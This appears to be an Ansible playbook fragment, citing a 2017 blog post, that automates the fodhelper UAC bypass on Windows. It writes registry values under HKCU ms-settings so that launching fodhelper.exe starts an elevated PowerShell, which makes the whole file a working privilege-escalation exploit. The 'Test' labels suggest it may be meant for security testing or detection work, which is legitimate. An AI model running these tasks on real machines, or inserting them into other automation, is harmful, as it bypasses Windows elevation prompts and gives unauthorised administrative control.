---

## https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
## only valid for admin users
- name: Add registry path ms-settings
  ansible.windows.win_regedit:
    path: HKCU:\Software\Classes\ms-settings\Shell\Open\command

- name: Test UAC bypass
  ansible.windows.win_regedit:
    path: HKCU:\Software\Classes\ms-settings\Shell\Open\command
    name: "{{ item.n }}"
    data: "{{ item.d }}"
    type: string
  with_items:
    - { n: DelegateExecute, d: '' }
    - { n: '(default)', d: 'cmd /c start powershell.exe' }

- name: Test UAC bypass - launch fodhelper
  ansible.windows.win_command: "C:\\Windows\\System32\\fodhelper.exe"
